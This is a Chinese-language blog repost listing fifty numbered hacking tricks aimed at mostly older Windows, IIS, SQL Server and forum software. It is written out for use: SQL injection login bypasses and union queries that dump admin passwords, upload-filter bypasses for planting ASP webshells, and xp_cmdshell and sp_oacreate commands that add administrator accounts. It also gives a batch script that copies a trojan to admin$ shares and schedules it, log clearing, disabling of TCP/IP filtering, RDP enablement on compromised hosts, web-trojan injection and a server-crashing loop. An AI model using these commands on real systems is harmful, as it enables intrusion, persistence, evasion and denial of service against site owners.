***的50种方法
現在網上的***事件越來越多,***都是通過什么方法來***我們的呢?下面我們給大家總結了******網絡的五十種方法,讓大家做到有備無患。 1.網寬網絡有限公司制作的網站基本都有注入漏洞 搜索網寬網絡 2.搜索欄里輸入 關鍵字%'and 1=1 and '%'=' 關鍵字%'and 1=2 and '%'=' 比較不同處 可以作為注入的特征字符 3.登陸框用戶名和密碼輸入'or'='or' 漏洞很老但是現在很是遍地都是 4.我們先到[url]www.google.com[/url]底下搜索一下co net mib ver 1.0 密碼帳號都是 'or'='or' 5.掛馬代碼 6.[url]http://www.wyyfk.com/24[/url]小時掛qq工具(失效) 7.開啟regedt32的sam的管理員權限 檢查hkey_local_machine\sam\sam\和hkey_local_machine\sam\sam\下的管理員和guest的f鍵值,如果一樣就是用被***過了,然后刪了guest帳號,對方可以用guest帳號使用administraeors的權限,你也可以用這方法留住肉雞,這方法是簡單克隆, net localgroup administrators還是可以看出guest是管理員來 7.只要敢想,新浪也可*** 注入點 [url]http://igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=59[/url] 微軟官方網站注入點 [url]http://www.microsoft.com/library/toolbar/3.0/search.aspx?view=en-us&charset=iso-8859-1&qu=[/url] 8.ms05016***工具用法 mshta.exe test.hta 文件名.后綴名 可以綁上qq大盜*** 9.有sa權限sqlserver數據庫、并且能sql注入支持fso+asp的服務器 sql注入后,如何上傳***, 文章地址 [url]http://hack123.home4u.china.com/0601.htm[/url] 10.qq強制聊天代碼 [url]http://wpa.qq.com/msgrd?v=1&uin=[/url]對方的qq號&site=ioshenmue&menu=yes 使用方法:把代碼中的紅色的“********”星號換成你想與其聊天的qq號后復 制到瀏覽器的地址欄處即可。無論他是否你的好友,你無須加他為好友就能給 他發qq消息。 11. mybbs論壇cookie欺騙 后臺備份馬 12.軟件instsrv.exe 把.exe文件做成系統服務來啟動 用來肉雞掛qq等 用法: 安裝: instsrv.exe 服務名稱 路徑 卸載: instsrv.exe 服務名稱 remove 13.以動網為例數據庫查找dv_log,在上面的查詢的字段名里選l_content后面的關鍵字填上password2,找到的username2=%b7%e7%a4%ce%b0%d7%d2%c2&password2=01180017&username1=%b7%e7%a4%ce%b0%d7%d2%c2&submit=%cc%ed+%bc%d3 password2=01180017就是他的登陸密碼 14.搜索的技巧 inurl:網址 15.啟航工作室wms 5.0網站程序漏洞 在baidu 搜索powered by: sailingstudio website manage system 5.0 (sp1) 利用動畫看[url]http://soft.77169.com/62/20050530/6824.html[/url] 16.很多網站程序(比如華碩中文官方網站)上傳圖片時有可能在檢測文件的時候是 從左朝又進行檢測,也就是說,他會檢測文件是不是有.jpg,那么我們要是把文件改成:ating.jpg.asp試試。。由于還是asp結尾,所以***不會變~ 17.天意商務系統網上依然有 有漏洞 網站具體的樣式[url]http://www.wzgcc.org/[/url] 工具下載[url]www.hack6.com[/url] 地址欄里,填上天意商務系統的網址就可以了,注意一定要是主頁面 18.sql注入時工具---internet選項---高級里找到顯示友好的錯誤信息勾去掉 不能注入時要第一時間想到%5c暴庫 19.這個dbinbd.asp文件插入后門的功能適用于文件名為.asp的所有access數據庫不是動網論壇也一樣可以使用的,后門隱蔽,幾乎發現不了 工具使用方法動畫和所有文件 [url]http://www.anquanwu.com/bbs/printpage.asp?boardid=2&id=811[/url] 20.缺少xp_cmdshell時 嘗試恢復exec sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll' 假如恢復不成功,可以嘗試直接加用戶(針對開3389的) declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',null,'cmd.exe /c net user ating ating /add' 再提到管理員 21.批量種植***.bat for /f %%i in (掃描地址.txt) do copy pc.exe %%i\admin$ 復制***到掃描的計算機當中 for /f %%i in (掃描地址.txt) do at %%i 09:50 pc.exe 在對方計算機上運行***的時間 掃描地址.txt里每個主機名一行 用\\開頭 22.搜索 powered by discuz!4.0.0rc3 開放頭像的可利用 工具地址[url]www.hack6.com[/url] 23.dv7.1用還原數據功能 還原asa*** 24.凡人網絡購物系統v6.0 可以%5c暴庫 25.ipb2.0.2漏洞 構造語句 $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理員密碼 想看動畫到黑基里找 ipb<= 2.0.3論壇注入工具 [url]www.hack6.com[/url]有下載 26. 將工具傳到郵箱 在下載上右擊 復制快捷方式 擁有自己了的下載空間 27.北京沖qb要寬帶號跟綁定寬帶的后4位電話,當你掃出北京款待號的密碼必須是8位的密碼,而且開頭是6或8的才可以,因為北京的電話都是6根8開頭的而且都是8位的,北京的區名海淀 東城 西城 門頭溝 豐臺 潮陽 宣武 通州 昌平,去[url]http://cnc.qq.com/bbn/[/url]沖 28.搜索 企業網絡辦公系統 添'or''=' 登陸 在個人郵箱 上傳asp*** 29.本人原創 搜索"一點點星空驛站 留言本" 默認數據庫是gbmdb.mdb 很多網站用這個留言本 但是用搜索引擎搜不到 可以給大家在入寢時多個思路 30.在程序上傳shell過程中,程序不允許包含標記符號的內容的文件上傳,比如藍屏最小 的asp***,我們來把他的標簽換一下: 保存為.asp,程序照樣 執行. 31.目錄權限設置禁止詞語的話可以用一些方法(比如serv-u溢出)將此web用戶提權 可訪問全站目錄掛馬 32.喜歡網頁掛馬的看看這篇總結文章吧 [url]http://77169.com/news/hk/2005060611656.html[/url] 33.搜索"p_w_picpaths/admin" 或".tw/p_w_picpaths/admin" 可以找到些臺灣的數據庫 34.iis6 for windows 2003 enterprise edition 如iis發布目錄文件夾包含.asp后輟名. 將.asp后輟改為.jpg或其它的如.htm,也可以運行asp,但要在.asp文件夾下. .cer 等后綴的文件夾下都可以運行任何后綴的asp*** 35.telnet一臺交換機 然后在telnet控制主機 控制主機留下的是交換機的ip 然后用#clear logg和#clear line vty *刪除日志 36.搜索關鍵字:"copyright 2003-2004 動易網絡" 后面地址改成upfile_soft.asp 這樣的漏洞很多 37.bbsxp的漏洞總結 powered by bbsxp 5.15/licence blog.asp中的對id 的過濾不嚴的漏洞 拿到管理員的前后臺密碼 工具:bbsxp完全版 cookies 欺騙 bbsxp 過濾了 asp 文件的上傳 所以我們這里用 asa 來傳馬 38.學會總結***思路[url]http://www.77169.com/news/hk/2005060811688.html[/url] 39.電腦壞了省去重新安裝系統的方法 純dos下執行, xp:copy c:\windows\repair\*.* 到c:\windows\system32\config 2k: copy c:\winnt\repair\*.* 到c:\winnt\system32\config 40.一般人設置啊拉qq大盜的時候發信和收信都是同一個信箱,因此當我的機子中了此***后沒有立即殺掉進程,而是用內存編輯工具打開它的進程,查找smtp字樣,就會找到它的信箱和密碼了。只對1.5以前的管用. 41.內網控制內網 用vidc 還要有一只肉雞 動畫看黑基的 [url]http://soft.77169.com/62/20050608/6878.html[/url] 42.有許多管理員用備份的日期做備份數據庫的名字 比如[url]http://www.hack6.com/bbs/databackup/20050601.mdb[/url] 43.動網數據庫oldusername=%b5%f0%b7%c0&username2=%b5%f0%b7%c0&password2=19841202&adduser=%b5%f0%b7%c0&id=12&submit=%b8%fc+%d0%c2 不知道用戶名(不是%b8%f0%b7%c0) 轉化這個用他本身的頁面 [url]http://www.hack6.com/bbs/showerr.asp?boardid=0&errcodes=10[/url],11&action=%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2 %cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2這句話意思是“填寫登錄信息” 那么就把%cc%ee%d0%b4%b5%c7%c2%bc%d0%c5%cf%a2換成%b5%f0%b7%c0 可以看到用戶名 44.對付信息監控系統 ***必須是加密的 如net user用不了就用net1 user等等 我是大連的 大連這邊主機用這方法好用 可以直接傳加密的馬 用用黑基tyrant的方法 上傳一個cmd的aspshall 用nc連接自己的nc監聽端口 在web目錄下寫個加ftp用戶的txt 本地43958用nc提交 ftp到服務器加用戶 45.解決tcp/ip篩選 在注冊表里有三處,分別是: hkey_local_machine\system\controlset001\services\tcpip hkey_local_machine\system\controlset002\services\tcpip hkey_local_machine\system\currentcontrolset\services\tcpip 分別用 regedit -e d:\a.reg hkey_local_machine\system\currentcontrolset\services\tcpip regedit -e d:\b.reg hkey_local_machine\system\controlset002\services\tcpip regedit -e d:\c.reg hkey_local_machine\system\currentcontrolset\services\tcpip 命令來導出注冊表項 然后把三個文件里的enablesecurityfilters"=dword:00000001, 改成enablesecurityfilters"=dword:00000000 再將以上三個文件分別用 regedit -s d:\a.reg regedit -s d:\b.reg regedit -s d:\c.reg 導入注冊表即可 46.使chm***無法在本地運行***程序 將注冊表"hkey_current_u ser\software\microsoft\windows\currentversion\internet settings\zones\0"下的1004項的值由原來十進制的0改為十六進制的3。 47.開3389的5種方法 (1)打開記事本,編輯內容如下: echo [components] > c:\sql echo tsenable = on >> c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 編輯好后存為bat文件,上傳至肉雞,執行。 (2) (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05 下載地址:[url]www.netsill.com/rots.zip[/url] 在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本,例如: c:\>cscript. rots.vbs <目標ip> <用戶名> <密碼> [服務端口] [/r] 如果要對本地使用,ip地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用 ""表示)。 (3)djshao正式版5.0 解壓djshao5.0.zip,用你的隨便什么方法把把解壓出來的djxyx*.**e上傳到肉雞的c:\winnt\temp下,然后 進入c:\winnt\temp目錄執行djxyx*.**e解壓縮文件,然后再執行解壓縮出來的azzd.exe文件,等一會肉雞 會自動重啟!重啟后會出現終端服務 (4)下載dameware nt utilities 3.66.0.0 注冊版 地址[url]www.netsill.com/dwmrcw36600.zip[/url] 安裝注冊完畢后輸入對方ip用戶名密碼,等待出現是否安裝的對話框點是。 復制啟動后出現對方桌面。 在對方桌面進入控制面版,點添加或刪除程序。進入后點添加/刪除windows組件,找到終端服務,點際進入 后在啟動終端服務上打上勾。確定自動提示重起,重起后ok (5)大家最常用的 3389.exe 下載地址[url]www.hack6.com[/url] 把程序上傳到肉雞運行后重啟既可 48.qq上得到別人的ip 一般跟別人聊天 如果是對方先對你說話 那么她的ip顯示出來的概率就大 當然如果是我們找對方 可以先跟她說發過去消息之后 然后關閉窗口等待她的回復 還可以用天網防火墻選擇上udp數據保檢測,即可攔截到對方ip 49.掛馬js代碼document.write('');保存到js頁面里 可讓所有頁面掛馬 50.讓服務器重啟 寫個bat死循環: @echo off :loop1 cls start cmd.exe goto loop1 保存成bat guset權限就可以運行 運行后很快服務器就會死機 管理員自然會去重啟
轉載于:https://blog.51cto.com/87209073/100914
總結
- 上一篇: 最新代理服务器列表 2008-09-2
- 下一篇: Windows Server 2008十